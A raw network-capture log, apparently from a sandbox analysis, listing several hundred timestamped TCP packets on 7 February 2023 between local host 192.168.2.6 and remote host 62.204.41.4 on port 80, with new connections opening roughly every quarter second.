                          Feb 7, 2023 20:01:16.810089111 CET4981880192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:16.871846914 CET804981862.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:16.873842955 CET804981862.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:16.874056101 CET4981880192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:16.981750011 CET4981880192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:16.982635021 CET4981980192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:17.043736935 CET804981862.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:17.044003963 CET4981880192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:17.044178009 CET804981962.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:17.045663118 CET4981980192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:17.050745964 CET4981980192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:17.112118006 CET804981962.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:17.115938902 CET804981962.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:17.120018959 CET4981980192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:17.233407021 CET4981980192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:17.235249996 CET4982080192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:17.295593977 CET804981962.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:17.295810938 CET4981980192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:17.299042940 CET804982062.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:17.299340963 CET4982080192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:17.299894094 CET4982080192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:17.362515926 CET804982062.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:17.364586115 CET804982062.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:17.364841938 CET4982080192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:17.482371092 CET4982080192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:17.483870029 CET4982180192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:17.545236111 CET804982062.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:17.547075987 CET804982162.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:17.547317028 CET4982080192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:17.547400951 CET4982180192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:17.548024893 CET4982180192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:17.610235929 CET804982162.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:17.612590075 CET804982162.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:17.612680912 CET4982180192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:17.717545033 CET4982180192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:17.718506098 CET4982280192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:17.779963017 CET804982162.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:17.780036926 CET804982262.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:17.780132055 CET4982180192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:17.780306101 CET4982280192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:17.781117916 CET4982280192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:17.842745066 CET804982262.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:17.844888926 CET804982262.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:17.845917940 CET4982280192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:17.949585915 CET4982280192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:17.950499058 CET4982380192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:18.011565924 CET804982362.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:18.011643887 CET804982262.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:18.011897087 CET4982380192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:18.013653994 CET4982280192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:18.077794075 CET4982380192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:18.138756037 CET804982362.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:18.141810894 CET804982362.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:18.141994953 CET4982380192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:18.263894081 CET4982380192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:18.264651060 CET4982480192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:18.324126005 CET804982462.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:18.324261904 CET4982480192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:18.324702024 CET804982362.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:18.324846029 CET4982380192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:18.327899933 CET4982480192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:18.387484074 CET804982462.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:18.389848948 CET804982462.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:18.389969110 CET4982480192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:18.495862961 CET4982480192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:18.496577978 CET4982580192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:18.555418968 CET804982462.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:18.555733919 CET4982480192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:18.558321953 CET804982562.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:18.558511972 CET4982580192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:18.559731960 CET4982580192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:18.622153044 CET804982562.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:18.625855923 CET804982562.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:18.625998974 CET4982580192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:18.730897903 CET4982580192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:18.732048988 CET4982680192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:18.793046951 CET804982562.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:18.793205023 CET4982580192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:18.794426918 CET804982662.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:18.794605970 CET4982680192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:18.795279980 CET4982680192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:18.857810974 CET804982662.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:18.859751940 CET804982662.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:18.859895945 CET4982680192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:18.971184969 CET4982680192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:18.972475052 CET4982780192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:19.033252001 CET804982762.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:19.033590078 CET4982780192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:19.033830881 CET804982662.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:19.033931971 CET4982680192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:19.034168005 CET4982780192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:19.094630003 CET804982762.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:19.099330902 CET804982762.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:19.099543095 CET4982780192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:19.216332912 CET4982780192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:19.217984915 CET4982880192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:19.277112961 CET804982762.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:19.277283907 CET4982780192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:19.280755043 CET804982862.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:19.281060934 CET4982880192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:19.281462908 CET4982880192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:19.344012976 CET804982862.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:19.346347094 CET804982862.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:19.346504927 CET4982880192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:19.450792074 CET4982880192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:19.451510906 CET4982980192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:19.513159990 CET804982962.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:19.513298035 CET4982980192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:19.514062881 CET4982980192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:19.514229059 CET804982862.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:19.514333010 CET4982880192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:19.574568033 CET804982962.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:19.576844931 CET804982962.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:19.577004910 CET4982980192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:19.689372063 CET4982980192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:19.690080881 CET4983080192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:19.749975920 CET804982962.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:19.750128984 CET4982980192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:19.750361919 CET804983062.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:19.750519991 CET4983080192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:19.753947020 CET4983080192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:19.814471960 CET804983062.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:19.816864014 CET804983062.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:19.816989899 CET4983080192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:19.933579922 CET4983080192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:19.936146021 CET4983180192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:19.994175911 CET804983062.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:19.994333982 CET4983080192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:19.995836973 CET804983162.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:19.995953083 CET4983180192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:19.998059988 CET4983180192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:20.057732105 CET804983162.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:20.060909033 CET804983162.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:20.060976982 CET4983180192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:20.176212072 CET4983180192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:20.177074909 CET4983280192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:20.236000061 CET804983162.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:20.236119032 CET4983180192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:20.237637043 CET804983262.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:20.237780094 CET4983280192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:20.240758896 CET4983280192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:20.301160097 CET804983262.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:20.305460930 CET804983262.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:20.305605888 CET4983280192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:20.419162035 CET4983280192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:20.419987917 CET4983380192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:20.479845047 CET804983262.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:20.479953051 CET4983280192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:20.482484102 CET804983362.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:20.482615948 CET4983380192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:20.483012915 CET4983380192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:20.545548916 CET804983362.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:20.547585011 CET804983362.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:20.547792912 CET4983380192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:20.653589010 CET4983380192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:20.654484987 CET4983480192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:20.715337992 CET804983462.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:20.715590954 CET4983480192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:20.716373920 CET804983362.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:20.716500044 CET4983380192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:20.722457886 CET4983480192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:20.783031940 CET804983462.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:20.785341024 CET804983462.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:20.785486937 CET4983480192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:20.902936935 CET4983480192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:20.903762102 CET4983580192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:20.963705063 CET804983462.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:20.964056015 CET4983480192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:20.964107990 CET804983562.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:20.964391947 CET4983580192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:20.965850115 CET4983580192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:21.026201010 CET804983562.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:21.028662920 CET804983562.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:21.028908968 CET4983580192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:21.137447119 CET4983580192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:21.138140917 CET4983680192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:21.198043108 CET804983562.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:21.198827028 CET4983580192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:21.199667931 CET804983662.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:21.200031042 CET4983680192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:21.202537060 CET4983680192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:21.264616966 CET804983662.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:21.268675089 CET804983662.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:21.269979954 CET4983680192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:21.388817072 CET4983680192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:21.390433073 CET4983780192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:21.450000048 CET804983762.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:21.450345039 CET804983662.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:21.450607061 CET4983680192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:21.453902960 CET4983780192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:21.459259987 CET4983780192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:21.518819094 CET804983762.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:21.520694971 CET804983762.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:21.520946980 CET4983780192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:21.638294935 CET4983780192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:21.639128923 CET4983880192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:21.698498011 CET804983762.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:21.698632956 CET4983780192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:21.701215982 CET804983862.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:21.701457024 CET4983880192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:21.703798056 CET4983880192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:21.765548944 CET804983862.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:21.767724037 CET804983862.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:21.768639088 CET4983880192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:21.885093927 CET4983880192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:21.886539936 CET4983980192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:21.947088003 CET804983862.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:21.947276115 CET4983880192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:21.948179960 CET804983962.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:21.948394060 CET4983980192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:21.949196100 CET4983980192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:22.010775089 CET804983962.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:22.013309002 CET804983962.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:22.013467073 CET4983980192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:22.123639107 CET4983980192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:22.125847101 CET4984080192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:22.185388088 CET804983962.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:22.185489893 CET4983980192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:22.187232971 CET804984062.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:22.187377930 CET4984080192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:22.187784910 CET4984080192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:22.249314070 CET804984062.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:22.253473997 CET804984062.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:22.253689051 CET4984080192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:22.358606100 CET4984080192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:22.360620975 CET4984180192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:22.420384884 CET804984062.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:22.420516014 CET4984080192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:22.423126936 CET804984162.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:22.423317909 CET4984180192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:22.423645973 CET4984180192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:22.485944033 CET804984162.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:22.488256931 CET804984162.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:22.488450050 CET4984180192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:22.594734907 CET4984180192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:22.598030090 CET4984280192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:22.657434940 CET804984162.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:22.657553911 CET4984180192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:22.658715010 CET804984262.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:22.658844948 CET4984280192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:22.668684959 CET4984280192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:22.729969978 CET804984262.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:22.732220888 CET804984262.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:22.732407093 CET4984280192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:22.843416929 CET4984280192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:22.844198942 CET4984380192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:22.904266119 CET804984262.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:22.904365063 CET4984280192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:22.906817913 CET804984362.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:22.906968117 CET4984380192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:22.907370090 CET4984380192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:22.969804049 CET804984362.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:22.972731113 CET804984362.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:22.972868919 CET4984380192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:23.076297998 CET4984380192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:23.077461004 CET4984480192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:23.137890100 CET804984462.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:23.138192892 CET4984480192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:23.138868093 CET804984362.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:23.138925076 CET4984480192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:23.138946056 CET4984380192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:23.200340033 CET804984462.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:23.204888105 CET804984462.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:23.205054045 CET4984480192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:23.311310053 CET4984480192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:23.312262058 CET4984580192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:23.371886015 CET804984562.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:23.371947050 CET804984462.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:23.372081041 CET4984580192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:23.372136116 CET4984480192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:23.372817039 CET4984580192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:23.432214975 CET804984562.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:23.434403896 CET804984562.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:23.434528112 CET4984580192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:23.543870926 CET4984580192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:23.544806957 CET4984680192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:23.603461027 CET804984562.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:23.603634119 CET4984580192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:23.604572058 CET804984662.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:23.604703903 CET4984680192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:23.606580973 CET4984680192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:23.666389942 CET804984662.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:23.677861929 CET804984662.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:23.678046942 CET4984680192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:23.793133020 CET4984680192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:23.793971062 CET4984780192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:23.852905989 CET804984662.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:23.853096962 CET4984680192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:23.853250980 CET804984762.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:23.853394985 CET4984780192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:23.854307890 CET4984780192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:23.913652897 CET804984762.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:23.918473005 CET804984762.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:23.920105934 CET4984780192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:24.029871941 CET4984780192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:24.030735970 CET4984880192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:24.090490103 CET804984762.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:24.092411041 CET4984780192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:24.094248056 CET804984862.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:24.094480038 CET4984880192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:24.096024990 CET4984880192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:24.160110950 CET804984862.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:24.164890051 CET804984862.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:24.165009022 CET4984880192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:24.278892994 CET4984880192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:24.279822111 CET4984980192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:24.341515064 CET804984962.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:24.341548920 CET804984862.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:24.341731071 CET4984880192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:24.342135906 CET4984980192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:24.342359066 CET4984980192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:24.404269934 CET804984962.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:24.406771898 CET804984962.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:24.407015085 CET4984980192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:24.528486013 CET4984980192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:24.529767036 CET4985080192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:24.590326071 CET804984962.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:24.591272116 CET804985062.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:24.591430902 CET4984980192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:24.591491938 CET4985080192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:24.592098951 CET4985080192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:24.653553009 CET804985062.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:24.656240940 CET804985062.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:24.656326056 CET4985080192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:24.766738892 CET4985080192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:24.767777920 CET4985180192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:24.828409910 CET804985062.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:24.829302073 CET4985080192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:24.830223083 CET804985162.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:24.832393885 CET4985180192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:24.881496906 CET4985180192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:24.944123983 CET804985162.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:24.946882963 CET804985162.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:24.947093010 CET4985180192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:25.278781891 CET4985180192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:25.279628992 CET4985280192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:25.340475082 CET804985262.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:25.340723038 CET4985280192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:25.341314077 CET804985162.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:25.341418982 CET4985180192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:25.383304119 CET4985280192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:25.445421934 CET804985262.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:25.449835062 CET804985262.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:25.450084925 CET4985280192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:25.627831936 CET4985280192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:25.628648996 CET4985380192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:25.688879967 CET804985262.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:25.689110041 CET4985280192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:25.690130949 CET804985362.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:25.690326929 CET4985380192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:25.706872940 CET4985380192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:25.768372059 CET804985362.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:25.771174908 CET804985362.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:25.771383047 CET4985380192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:26.446230888 CET4985380192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:26.507756948 CET804985362.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:26.507986069 CET4985380192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:26.521596909 CET4985480192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:26.582315922 CET804985462.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:26.582604885 CET4985480192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:26.635793924 CET4985480192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:26.696433067 CET804985462.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:26.700578928 CET804985462.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:26.700764894 CET4985480192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:26.872890949 CET4985480192.168.2.662.204.41.4
